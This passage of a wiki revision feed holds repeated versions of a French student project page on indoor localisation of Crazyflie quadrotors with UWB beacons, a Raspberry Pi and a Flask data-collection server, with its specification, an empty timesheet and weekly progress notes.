|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Avancement du Projet'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Phase préparatoire'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 21/09/17 - Ven 22/09/17]]'' &lt;br /&gt;
*Rendez-vous de mise au point du cahier des charges avec les encadrants/intervenants (M. ZHENG Gang et M. DAGHER Roudy)&lt;br /&gt;
*Elaboration du cahier des charges&lt;br /&gt;
*Elaboration de la page Wiki (préparation de la mise en page et présentation du sujet)&lt;br /&gt;
*Préparation du travail sous forme de Mind Map&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 1'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 28/09/17 - Ven 29/09/17]]'' &lt;br /&gt;
*Revue du Cahier des Charges avec les encadrants&lt;br /&gt;
*Lecture et recherches sur les technologies adaptées&lt;br /&gt;
*Construction de la suite de la Mind Map&lt;br /&gt;
*Création du Gitlab&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 2'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 05/10/17 - Ven 06/10/17]]''  &lt;br /&gt;
*Précisions sur le cahier des charges&lt;br /&gt;
*Listage du matériel&lt;br /&gt;
*Recherche et détermination de solutions technologiques possibles pour les fonctions demandées&lt;br /&gt;
*Début du travail sur le serveur de collecte&lt;br /&gt;
*Apprentissage du langage Python et de l'utilisation du framework Flask&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 3'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Mer 11/10/17 - Jeu 12/10/17]]''  &lt;br /&gt;
*Recherche et développement initial du serveur de collecte de données&lt;br /&gt;
*Complément du Git sur les tâches à effectuer&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Requete s3.PNG|400px|thumb|right|serveur flask]]&lt;br /&gt;
Nous avons commencé à créer un serveur flask renvoyant pour l'instant une matrice aléatoire. Lors de la requete URL &amp;quot;../matrice&amp;quot;, nous voyons bien une matrice aléatoire apparaitre sur la page WEB. Nous essayons de nous connecter à la Raspberry pi en redirigeant sont port série vers le Bluetooth de façon à récupérer de vrai matrices de distance entre le drone et les balises. Nous pourrons afficher ensuite ces matrices ou alors les stocker dans un fichier en attendant le traitement de celle ci.&lt;br /&gt;
&lt;br /&gt;
Nous avons plusieurs problème avec le Bluetooth pour se connecter avec la Raspberry pi. Quand nous aurons réussi à nous connecter au port série de la Raspberry pi alors nous pour gérer le traitement des données récupérées.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 4'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 19/10/17 - Ven 20/10/17]]''  &lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 5'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 26/10/17 - Ven 27/10/17]]''  &lt;br /&gt;
*&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45696</id>
		<title>P18 Localisation of quadrotors</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45696"/>
				<updated>2017-10-18T09:20:44Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Semaine 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Cahier des charges'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Présentation générale du projet&amp;lt;/span&amp;gt;=== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Contexte&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Dans un monde de plus en plus connecté, de nombreux drones sont déployés pour diverses applications comme l'espionnage, la surveillance, la cartographie de lieux et la livraison de colis. Les technologies nécessaires pour contrôler ces drones sont des sujets de recherche actuels. &lt;br /&gt;
&lt;br /&gt;
Le contrôle de ceux-ci passe tout d'abord par la maîtrise de leur position dans l'espace. Le développement des applications liées à l'utilisation de drones nécessite un travail important sur la localisation spatiale d'objets connectés. &lt;br /&gt;
&lt;br /&gt;
De plus, dans un souci d'utilisation, il est essentiel de développer des interfaces logicielles permettant d'exploiter ces données.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Objectif du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce projet est de développer une interface logicielle permettant de traiter en temps réel les informations de localisation d'un drone et de balises, dans le but de définir leur localisation dans l'espace, en intérieur.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Description du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le contrôle de drones, la première étape importante est de donner ses informations de position. Le but du projet est de développer une interface logicielle permettant de localiser le drone en temps réel en intérieur. Le drone se déplace dans un environnement dans lequel ont été installées de multiples balises. Il est équipé d'une carte, lui permettant de recevoir les distances relatives entre lui-même et les balises, sur laquelle différents algorithmes vont être implémentés pour effectuer la localisation en temps réel. Le projet requiert des compétences en développement hardware (Crazyflie 2.0, voir https://wiki.bitcraze.io/) et software (langage C/C++/Python/Javascript/HTML...).&lt;br /&gt;
&lt;br /&gt;
Il se divise en 4 étapes principales, qui sont:&lt;br /&gt;
*1) Choisir les technologies utilisées&lt;br /&gt;
*2) Choisir l'architecture (OS / APIs)&lt;br /&gt;
*3) Développer les différentes parties du projet&lt;br /&gt;
*4) Intégrer et connecter les différentes parties du projet&lt;br /&gt;
&lt;br /&gt;
La localisation étant en intérieur, le protocole GPS n'est donc pas assez précis pour les applications ciblées. La mise en place d'un tel dispositif permettrait grâce à l'utilisation d'un algorithme d'estimer avec une bonne précision les positions en intérieur d'une balise centrale (appelée Tag) et de balises (appelées Anchor). Le Tag scanne en temps réel la distance relative aux différentes balises, et il nous est retourné la position des balises et du Tag grâce à l'algorithme de localisation.&lt;br /&gt;
&lt;br /&gt;
Le projet se compose de 3 parties:&lt;br /&gt;
* Collect &amp;amp; parse: collecter les données envoyées par les balises en communiquant avec un serveur et récupérer les données adéquates par un tri&lt;br /&gt;
* Localise: déterminer la matrice de position des balises et du Tag en traitant les données récupérées&lt;br /&gt;
* Display: développer l'interface homme machine pour afficher, étudier et utiliser les données traitées&lt;br /&gt;
&lt;br /&gt;
Nous travaillerons dans un premier temps dans une optique temps différé avant de travailler en temps réel. Cela nous permettra d'acquérir des données utiles et réutilisables en aval. &lt;br /&gt;
&lt;br /&gt;
A l'aboutissement du projet, nous devrions être capable via l'interface homme machine développée d'afficher précisément la position spatiale des balises ainsi que du Tag, grâce àl'utilisation d'un algorithme de localisation et des données récupérées, et d'afficher d'autres données relatives au déplacement du Tag ou des balises dans l'espace. &lt;br /&gt;
&lt;br /&gt;
Si le temps le permet, nous pourrons aussi être amenés à adapter et utiliser l'interface développée pour l'utilisation d'un drone.&lt;br /&gt;
&lt;br /&gt;
''Sujet originel''&lt;br /&gt;
&lt;br /&gt;
To achieve the control of quadrotors, the first important task to give its position information. This project is to develop a software(GUI) to localize the quadrotors in real-time. The quadrotor is flying in an environment where several transmitters have been installed. The quadrotor is equipped with a deck to receive the relative distances between the deck and all transmitters, based on which different algorithms will be implemented to realize the real-time localization. The candidates need to have both experiences on hardware (Crazyflie 2.0, see https://wiki.bitcraze.io/) and software development (C/C , Python…). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Calendrier&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
''[[Avant le 29/09/17]]'' - Élaboration du Cahier des charges, de la liste des tâches et du calendrier prévisionnel&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Octobre]]'' - Serveur de collecte et début du développement de l'interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Décembre]]'' - Interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[A la fin du PFE]]'' - Intégration finale des différentes parties (Serveur de collecte des données &amp;amp; Serveur de localisation &amp;amp; Interface logicielle)&lt;br /&gt;
&lt;br /&gt;
Répartition du volume de travail (***h):&lt;br /&gt;
&lt;br /&gt;
* Recherche sur les technologies à utiliser (**h)&lt;br /&gt;
* Développement du serveur de collecte de données (**h)&lt;br /&gt;
* Réalisation de l'interface logicielle (Web//Logiciel/Application) (**h)&lt;br /&gt;
* Intégration des différentes parties (**h)&lt;br /&gt;
* Test et débuggage (**h)&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix techniques : matériel et logiciel&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Afin de développer ce dispositif, nous allons utiliser une Raspberry Pi 3 associée à une carte réceptrice, qui communique avec 4 balises composées chacune d'un microcontrôleur et d'une carte émettrice radio (UWB5C) et alimentées par batteries. La carte réceptrice joue le rôle du drone à localiser et communiquera les données émises par les balises vers l'ordinateur via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix technologiques&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Voici les technologies que nous utilisons pour chacune des parties de ce projet.&lt;br /&gt;
&lt;br /&gt;
    1) Serveur de collecte des données:&lt;br /&gt;
       Scanne et parse les données récupérées pour fournir la matrice D des distances relatives du tag aux 4 balises&lt;br /&gt;
        - API&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    2) Serveur de localisation (fourni):&lt;br /&gt;
       Calcule grâce à l'algorithme de localisation et la matrice D les positions spatiales des 4 noeuds et du tag&lt;br /&gt;
        - API&lt;br /&gt;
        - Bootstrap&lt;br /&gt;
        - Jquery&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    3) Interface utilisateur:&lt;br /&gt;
       Affiche courbes, visualisation 3D, boutons ou données des fichiers envoyées par le serveur de localisation&lt;br /&gt;
        - HTML5 / Javascript&lt;br /&gt;
        - Fichiers JSON (serveurs de collecte et de localisation)&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Calendrier prévisionnel'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Liste des tâches à effectuer&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
# Se documenter sur le projet&lt;br /&gt;
##Langages et technologies utilisées&lt;br /&gt;
##Matériel utilisé&lt;br /&gt;
##Mettre en place du travail sur le Git&lt;br /&gt;
# Réaliser le serveur de collecte&lt;br /&gt;
##Récupérer les trames envoyées par bluetooth par le TAG via la Raspberry Pi&lt;br /&gt;
##Intégrer le serveur de localisation pour interpréter les trames&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
# Réaliser l'interface Web utilisateur&lt;br /&gt;
##Implémenter le serveur de collecte et de localisation&lt;br /&gt;
##Afficher et traiter les données stockées dans les fichiers JSON via le serveur (temps différé + temps réel)&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Feuille d'heures'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Tâche !! Prélude !! Heures S1 !! Heures S2 !! Heures S3 !! Heures S4 !! Heures S5 !! Heures S6 !! Heures S7 !! Heures S8 !! Heures S9 !! Heures S10 !! Heures S11 !! Heures S12 !! Après Noël !! Total&lt;br /&gt;
|-&lt;br /&gt;
| Cahier des charges / Wiki / Gitlab&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur les technos utilisées&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur le matériel&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement du serveur de collecte&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement de l'interface Web&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et intégration du serveur de localisation&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Intégration des différentes parties&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Tests et débuggage&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Optimisation/Correction des programmes&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Avancement du Projet'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Phase préparatoire'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 21/09/17 - Ven 22/09/17]]'' &lt;br /&gt;
*Rendez-vous de mise au point du cahier des charges avec les encadrants/intervenants (M. ZHENG Gang et M. DAGHER Roudy)&lt;br /&gt;
*Elaboration du cahier des charges&lt;br /&gt;
*Elaboration de la page Wiki (préparation de la mise en page et présentation du sujet)&lt;br /&gt;
*Préparation du travail sous forme de Mind Map&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 1'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 28/09/17 - Ven 29/09/17]]'' &lt;br /&gt;
*Revue du Cahier des Charges avec les encadrants&lt;br /&gt;
*Lecture et recherches sur les technologies adaptées&lt;br /&gt;
*Construction de la suite de la Mind Map&lt;br /&gt;
*Création du Gitlab&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 2'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 05/10/17 - Ven 06/10/17]]''  &lt;br /&gt;
*Précisions sur le cahier des charges&lt;br /&gt;
*Listage du matériel&lt;br /&gt;
*Recherche et détermination de solutions technologiques possibles pour les fonctions demandées&lt;br /&gt;
*Début du travail sur le serveur de collecte&lt;br /&gt;
*Apprentissage du langage Python et de l'utilisation du framework Flask&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 3'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Mer 11/10/17 - Jeu 12/10/17]]''  &lt;br /&gt;
*Recherche et développement initial du serveur de collecte de données&lt;br /&gt;
*Complément du Git sur les tâches à effectuer&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Requete s3.PNG|500px|thumb|right|serveur flask]]&lt;br /&gt;
Nous avons commencé à créer un serveur flask renvoyant pour l'instant une matrice aléatoire. Lors de la requete URL &amp;quot;../matrice&amp;quot;, nous voyons bien une matrice aléatoire apparaitre sur la page WEB. Nous essayons de nous connecter à la Raspberry pi en redirigeant sont port série vers le Bluetooth de façon à récupérer de vrai matrices de distance entre le drone et les balises. Nous pourrons afficher ensuite ces matrices ou alors les stocker dans un fichier en attendant le traitement de celle ci.&lt;br /&gt;
&lt;br /&gt;
Nous avons plusieurs problème avec le Bluetooth pour se connecter avec la Raspberry pi. Quand nous aurons réussi à nous connecter au port série de la Raspberry pi alors nous pour gérer le traitement des données récupérées.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 4'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 19/10/17 - Ven 20/10/17]]''  &lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 5'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 26/10/17 - Ven 27/10/17]]''  &lt;br /&gt;
*&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45694</id>
		<title>P18 Localisation of quadrotors</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45694"/>
				<updated>2017-10-18T09:16:31Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Semaine 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Cahier des charges'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Présentation générale du projet&amp;lt;/span&amp;gt;=== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Contexte&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Dans un monde de plus en plus connecté, de nombreux drones sont déployés pour diverses applications comme l'espionnage, la surveillance, la cartographie de lieux et la livraison de colis. Les technologies nécessaires pour contrôler ces drones sont des sujets de recherche actuels. &lt;br /&gt;
&lt;br /&gt;
Le contrôle de ceux-ci passe tout d'abord par la maîtrise de leur position dans l'espace. Le développement des applications liées à l'utilisation de drones nécessite un travail important sur la localisation spatiale d'objets connectés. &lt;br /&gt;
&lt;br /&gt;
De plus, dans un souci d'utilisation, il est essentiel de développer des interfaces logicielles permettant d'exploiter ces données.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Objectif du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce projet est de développer une interface logicielle permettant de traiter en temps réel les informations de localisation d'un drone et de balises, dans le but de définir leur localisation dans l'espace, en intérieur.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Description du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le contrôle de drones, la première étape importante est de donner ses informations de position. Le but du projet est de développer une interface logicielle permettant de localiser le drone en temps réel en intérieur. Le drone se déplace dans un environnement dans lequel ont été installées de multiples balises. Il est équipé d'une carte, lui permettant de recevoir les distances relatives entre lui-même et les balises, sur laquelle différents algorithmes vont être implémentés pour effectuer la localisation en temps réel. Le projet requiert des compétences en développement hardware (Crazyflie 2.0, voir https://wiki.bitcraze.io/) et software (langage C/C++/Python/Javascript/HTML...).&lt;br /&gt;
&lt;br /&gt;
Il se divise en 4 étapes principales, qui sont:&lt;br /&gt;
*1) Choisir les technologies utilisées&lt;br /&gt;
*2) Choisir l'architecture (OS / APIs)&lt;br /&gt;
*3) Développer les différentes parties du projet&lt;br /&gt;
*4) Intégrer et connecter les différentes parties du projet&lt;br /&gt;
&lt;br /&gt;
La localisation étant en intérieur, le protocole GPS n'est donc pas assez précis pour les applications ciblées. La mise en place d'un tel dispositif permettrait grâce à l'utilisation d'un algorithme d'estimer avec une bonne précision les positions en intérieur d'une balise centrale (appelée Tag) et de balises (appelées Anchor). Le Tag scanne en temps réel la distance relative aux différentes balises, et il nous est retourné la position des balises et du Tag grâce à l'algorithme de localisation.&lt;br /&gt;
&lt;br /&gt;
Le projet se compose de 3 parties:&lt;br /&gt;
* Collect &amp;amp; parse: collecter les données envoyées par les balises en communiquant avec un serveur et récupérer les données adéquates par un tri&lt;br /&gt;
* Localise: déterminer la matrice de position des balises et du Tag en traitant les données récupérées&lt;br /&gt;
* Display: développer l'interface homme machine pour afficher, étudier et utiliser les données traitées&lt;br /&gt;
&lt;br /&gt;
Nous travaillerons dans un premier temps dans une optique temps différé avant de travailler en temps réel. Cela nous permettra d'acquérir des données utiles et réutilisables en aval. &lt;br /&gt;
&lt;br /&gt;
A l'aboutissement du projet, nous devrions être capable via l'interface homme machine développée d'afficher précisément la position spatiale des balises ainsi que du Tag, grâce àl'utilisation d'un algorithme de localisation et des données récupérées, et d'afficher d'autres données relatives au déplacement du Tag ou des balises dans l'espace. &lt;br /&gt;
&lt;br /&gt;
Si le temps le permet, nous pourrons aussi être amenés à adapter et utiliser l'interface développée pour l'utilisation d'un drone.&lt;br /&gt;
&lt;br /&gt;
''Sujet originel''&lt;br /&gt;
&lt;br /&gt;
To achieve the control of quadrotors, the first important task to give its position information. This project is to develop a software(GUI) to localize the quadrotors in real-time. The quadrotor is flying in an environment where several transmitters have been installed. The quadrotor is equipped with a deck to receive the relative distances between the deck and all transmitters, based on which different algorithms will be implemented to realize the real-time localization. The candidates need to have both experiences on hardware (Crazyflie 2.0, see https://wiki.bitcraze.io/) and software development (C/C , Python…). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Calendrier&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
''[[Avant le 29/09/17]]'' - Élaboration du Cahier des charges, de la liste des tâches et du calendrier prévisionnel&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Octobre]]'' - Serveur de collecte et début du développement de l'interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Décembre]]'' - Interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[A la fin du PFE]]'' - Intégration finale des différentes parties (Serveur de collecte des données &amp;amp; Serveur de localisation &amp;amp; Interface logicielle)&lt;br /&gt;
&lt;br /&gt;
Répartition du volume de travail (***h):&lt;br /&gt;
&lt;br /&gt;
* Recherche sur les technologies à utiliser (**h)&lt;br /&gt;
* Développement du serveur de collecte de données (**h)&lt;br /&gt;
* Réalisation de l'interface logicielle (Web//Logiciel/Application) (**h)&lt;br /&gt;
* Intégration des différentes parties (**h)&lt;br /&gt;
* Test et débuggage (**h)&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix techniques : matériel et logiciel&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Afin de développer ce dispositif, nous allons utiliser une Raspberry Pi 3 associée à une carte réceptrice, qui communique avec 4 balises composées chacune d'un microcontrôleur et d'une carte émettrice radio (UWB5C) et alimentées par batteries. La carte réceptrice joue le rôle du drone à localiser et communiquera les données émises par les balises vers l'ordinateur via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix technologiques&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Voici les technologies que nous utilisons pour chacune des parties de ce projet.&lt;br /&gt;
&lt;br /&gt;
